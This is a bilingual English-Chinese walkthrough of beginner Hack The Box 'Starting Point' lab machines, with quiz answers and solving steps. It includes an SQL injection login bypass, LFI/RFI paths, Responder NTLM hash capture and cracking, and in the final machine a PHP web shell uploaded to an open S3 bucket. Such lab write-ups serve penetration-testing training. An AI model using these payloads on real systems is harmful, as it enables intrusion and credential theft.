STARTING POINT
Learn the basics of Penetration Testing
学习渗透测试的基础
[TOC]
0x01 Meow
very easy
连接VPN
下载OpenVPN配置文件,使用OpenVPN进行连接即可(推荐)
使用在线的PWN BOX(延迟比较高)
What does the acronym VM stand for?
VM是什么的缩写?
Virtual Machine
What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It's also known as a console or shell.
用什么工具启动连接VPN?也被叫做console或者shell。
Terminal
What service do we use to form our VPN connection into HTB labs?
使用什么服务通过VPN连接HTB的实验室?
OpenVpn
What is the abbreviated name for a 'tunnel interface' in the output of your VPN boot-up sequence output?
在VPN启动时,'tunnel interface'被缩写成什么?
tun
What tool do we use to test our connection to the target with an ICMP echo request?
使用什么工具通过ICMP协议对目标测试连接?
ping
What is the name of the most common tool for finding open ports on a target?
通常使用什么工具查找目标的开放端口?
nmap
What service do we identify on port 23/tcp during our scans?
需要用nmap进行扫描,nmap -sV ip
通过扫描发现端口23/tcp是什么服务?
telnet
What username is able to log into the target over telnet with a blank password?
什么用户可以通过telnet使用空白密码登录目标机器?
root
Submit root flag
提交root flag
登录目标机器之后,查看目录下的flag.txt
0x02 Fawn
very easy
What does the 3-letter acronym FTP stand for?
FTP是什么的缩写?
File Transfer Protocol
Which port does the FTP service listen on usually?
FTP服务通常监听在什么端口?
21
What acronym is used for the secure version of FTP?
FTP的安全版本缩写是什么?
sftp
From your scans, what version is FTP running on the target?
使用nmap扫描,nmap -sV ip
通过扫描,目标运行的FTP版本是多少?
vsftpd 3.0.3
From your scans, what OS type is running on the target?
通过扫描,目标运行的操作系统是什么?
Unix
What is the command we need to run in order to display the 'ftp' client help menu?
运行什么命令可以查看ftp的帮助菜单?
ftp -h
What is username that is used over FTP when you want to log in without having an account?
什么用户名可以不需要在账户登录FTP?
anonymous
What is the response code we get for the FTP message 'Login successful'?
FTP登录成功信息的返回码是多少?
230
There are a couple of commands we can use to list the files and directories available on the FTP server. One is dir. What is the other that is a common way to list files on a Linux system.
在FTP服务器上有两个命令可以列举文件和目录,一个是dir,另一个在linux系统上常用的是什么?
ls
What is the command used to download the file we found on the FTP server?
使用什么命令在FTP服务器上下载我们发现的文件?
get
Submit root flag
提交root flag
在服务器上下载flag.txt文件,然后查看
0x03 Dancing
very easy
What does the 3-letter acronym SMB stand for?
首字母缩写SMB代表什么?
Server Message Block
What port does SMB use to operate at?
SMB在什么端口上操作?
445
What is the service name for port 445 that came up in our Nmap scan?
Nmap扫描上端口445服务的名称是什么?
microsoft-ds
What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?
通过 smbclient -h 查看
可以使用SMB工具上的什么标志或开关列举出分享的内容?
-L
How many shares are there on Dancing?
在Dancing这个机器上分享了几个内容?
4
What is the name of the share we are able to access in the end with a blank password?
smbclient //ip/sharename
最终我们可以通过空白密码访问的分享叫什么 ?
WorkShares
What is the command we can use within the SMB shell to download the files we find?
用什么命令可以在SMB shell中下载找到的文件?
get
Submit root flag
提交flag
在文件夹中浏览,找到flag.txt,下载到本地查看
0x04 Redeemer
very easy
Which TCP port is open on the machine?
存在提示,四位数,最后一位为9,nmap -sS -sV -P0 -p1009-9999 ip
机器开放了哪个TCP端口?
6379
Which service is running on the port that is open on the machine?
机器上这个端口运行着什么服务?
Redis
What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database
- Redis是什么类型的数据库?1 内存数据库,2 传统数据
- In-memory Database
Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.
哪个命令行工具用于和Redis服务器进行交互?拼写你在终端输入的没有带任何参数的程序名。
redis-cli
Which flag is used with the Redis command-line utility to specify the hostname?
Redis命令行工具使用什么标志标记hostname?
-h
Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?
连接了Redis服务器之后,什么命令用于获取服务器的信息和统计情况?
info
What is the version of the Redis server being used on the target machine?
目标机器的Redis服务是什么版本?
5.0.7
Which command is used to select the desired database in Redis?
在Redis中什么命令用于切换指定的数据库?
select
How many keys are present inside the database with index 0?
select 0
keys *
在索引0的数据库中存在多少个键?
4
Which command is used to obtain all the keys in a database?
在数据库中什么命令用于获取所有的键?
keys *
Submit root flag
提交flag
键中有一个flag的键,然后get flag即可。
0x05 Appointment
very easy
What does the acronym SQL stand for?
SQL首字母缩写代表什么?
Structured Query Language
What is one of the most common type of SQL vulnerabilities?
SQL漏洞最常见的是是什么?
SQL Injection
What does PII stand for?
PII代表什么?
personally identifiable information
What is the 2021 OWASP Top 10 classification for this vulnerability?
- 在2021 OWASP Top 10中这个漏洞给的分类什么?
- A03:2021-Injection
What does Nmap report as the service and version that are running on port 80 of the target?
Nmap报告中目标80端口运行的服务和版本是什么?
Apache httpd 2.4.38 ((Debian))
What is the standard port used for the HTTPS protocol?
HTTPS协议默认使用什么端口?
443
What is a folder called in web-application terminology?
网络应用程序中文件夹被叫做什么?
Directory
What is the HTTP response code is given for 'Not Found' errors?
‘Not Found’错误的HTTP响应码是什么?
404
Gobuster is one tool used to brute force directories on a webserver. What switch do we use with Gobuster to specify we're looking to discover directories, and not subdomains?
OJ/gobuster: Directory/File, DNS and VHost busting tool written in Go (github.com)
Gobuster是一个对web服务器进行目录枚举的工具。Gobuster中使用什么开关查找目录,而不是子域名?
dir
What single character can be used to comment out the rest of a line in MySQL?
在MySQL中哪个字符被用于注释剩余的行?
#
If user input is not handled carefully, it could be interpreted as a comment. Use a comment to login as admin without knowing the password. What is the first word on the webpage returned?
密码:'+or+1=1#
如果用户输入没有被仔细处理,它可以被解释成为一个注释。通过一个注释在没有密码的情况下登录admin用户。网页返回的第一个单词是什么?
Congratulations
Submit root flag
提交flag
网页返回中有flag
0x06 Sequel
very easy
During our scan, which port do we find serving MySQL?
通过扫描,哪个端口运行了MySQL?
3306
What community-developed MySQL version is the target running?
目标运行的MySQL社区开发版的版本是什么 ?
MariaDB
When using the MySQL command line client, what switch do we need to use in order to specify a login username?
使用MySQL命令行客户端时,什么开关用于指定登陆用户名?
-u
Which username allows us to log into this MariaDB instance without providing a password?
什么用户名不用提供密码就允许登录这个MariaDB实例?
root
In SQL, what symbol can we use to specify within the query that we want to display everything inside a table?
在SQL中,什么符号被用于查询显示表的所有内容?
*
In SQL, what symbol do we need to end each query with?
在SQL中,我们需要在每个查询语句的结尾输入什么符号?
;
There are three databases in this MySQL instance that are common across all MySQL instances. What is the name of the fourth that's unique to this host?
这个MySQL实例中存在三个MySQL实例都存在的库。这个主机中四个数据库中存在的唯一的名字是什么?
htb
Submit root flag
提交flag
在htb库的config表中存在flag
0x07 Crocodile
very easy
What Nmap scanning switch employs the use of default scripts during a scan?
Nmap扫描使用什么标志去使用默认脚本进行扫描?
-sC
What service version is found to be running on port 21?
端口21运行的服务版本?
vsftpd 3.0.3
What FTP code is returned to us for the "Anonymous FTP login allowed" message?
Anonymous FTP login allowed消息的FTP返回码是多少?
230
After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?
通过ftp客户端连接到FTP服务器之后,输入什么进行匿名者登录?
anonymous
After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?
匿名连接FTP服务器之后,使用什么命令在FTP服务器上下载我们找到的文件?
get
What is one of the higher-privilege sounding usernames in 'allowed.userlist' that we download from the FTP server?
从FTP服务器上下载的'allowed.userlist'中,看起来像是高权限用户的用户名是什么?
admin
What version of Apache HTTP Server is running on the target host?
目标运行的Apache HTTP Server版本是多少?
Apache HTTP Server
What switch can we use with Gobuster to specify we are looking for specific filetypes?
可以使用Gobuster的什么标志查找特定的文件类型?
-x
Which PHP file can we identify with directory brute force that will provide the opportunity to authenticate to the web service?
通过目录枚举,发现哪个PHP文件提供web服务的认证?
login.php
Submit root flag
提交flag
从ftp上下载用户名和密码记载的文件,在http://ip/login.php上登录admin用户,即可看到flag
0x08 Responder
very easy
内网渗透-Responder捕获Win哈希_XG小刚的博客-CSDN博客linux修改hosts怎么生效-茶猫云 (cmy.cn)
Evil-Winrm : Winrm Pentesting Framework(远程渗透管理工具)_Thronexx的博客-CSDN博客_evil-winrm
When visiting the web service using the IP address, what is the domain that we are being redirected to?
当使用IP地址访问web服务的时候,会被重定向到什么域名?
unika.htb
Which scripting language is being used on the server to generate webpages?
需要将上面的域名在hosts文件中对应到目标机器,然后使用插件或者看相应内容判断。
服务器使用什么语言生成网页?
php
What is the name of the URL parameter which is used to load different language versions of the webpage?
什么URL参数名被用于加载网页的不同语言版本?
page
Which of the following values for the
pageparameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"?page参数设置为下面的哪一个值可以利用本地文件包含?
../../../../../../../../windows/system32/drivers/etc/hosts
Which of the following values for the
pageparameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"page参数设置为下面的哪一个值可以利用远程文件包含?
//10.10.14.6/somefile
What does NTLM stand for?
NTLM代表什么?
New Technology LAN Manager
Which flag do we use in the Responder utility to specify the network interface?
Reponder工具使用什么标志指定网络接口?
-I
There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as
john, but the full name is what?.有几个工具可以使用NetNTLMv2挑战/响应,并尝试数百万个密码,以查看是否有任何密码生成相同的响应。一个工具被叫做john,它的全名是什么?
John the Ripper
What is the password for the administrator user?
先用Responder指定openvpn生成的网络接口
使用网页的远程文件包含,访问本机ip,Responder会截取到ntlm的hash
然后使用john对哈希进行解密,密码字典使用/usr/share/wordlists/rockyou.txt
administrator的密码是什么?
badminton
We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
nmap --min-rate 5000 -p 1-65535 -sV ip
我们会使用一个windows服务远程使用得到的密码访问Responder机器。它监听的tcp端口是多少?
5985
Submit root flag
连接可以使用evil-winrm
提交flag
连接成功之后,在其他用户的桌面可以得到flag。
0x09 Three
very easy
前提
- thetoppers.htb
- 机器ip
How many TCP ports are open?
绑定目标机器ip和host
- 有多少TCP端口开放?
- 2
What is the domain of the email address provided in the "Contact" section of the website?
- 在网站的Contact中可以找到邮箱地址域名是什么?
- thetoppers.htb
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
- 在没有 DNS 服务器的情况下,我们可以使用哪个 Linux 文件将主机名解析为 IP 地址,以便能够访问指向这些主机名的网站?
- /etc/hosts
Which sub-domain is discovered during further enumeration?
gobuster vhost -u http://domain/ -w /usr/dicfile
- 通过枚举可以发现哪个子域名?
- s3.thetoppers.htb
Which service is running on the discovered sub-domain?
- 被发现的子域名运行着什么服务?
- Amazon S3
Which command line utility can be used to interact with the service running on the discovered sub-domain?
- 什么命令行工具可以用来和子域名上运行的服务进行交互?
- awscli
Which command is used to set up the AWS CLI installation?
- 什么命令用于设置AWS CLI安装?
- aws configure
What is the command used by the above utility to list all of the S3 buckets?
- 在上述的工具中什么命令用于列举S3 buckets?
- aws s3 ls
This server is configured to run files written in what web scripting language?
- 这个服务器被配置为运行用什么网页脚本语言写的文件?
- php
Submit root flag
- 提交flag
# 安装awscli
pip3 install awscli
# 配置awscli
python -m awscli configure
# 枚举s3文件
python -m awscli --endpoint=http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb/
# 创建存储目录
mkdir s3
# 下载s3文件
python -m awscli --endpoint=http://s3.thetoppers.htb/ s3 sync s3://thetoppers.htb/ ./s3/
# 创建一句话脚本文件
echo "<?php system(\$_GET[\"x\"]);?>" > shell.php
# 上传文件到s3服务
python -m awscli --endpoint=http://s3.thetoppers.htb/ s3 cp shell.php s3://thetoppers.htb/
# 然后就是访问http://thetoppers.htb/shell.php?x=xxx执行命令查找flag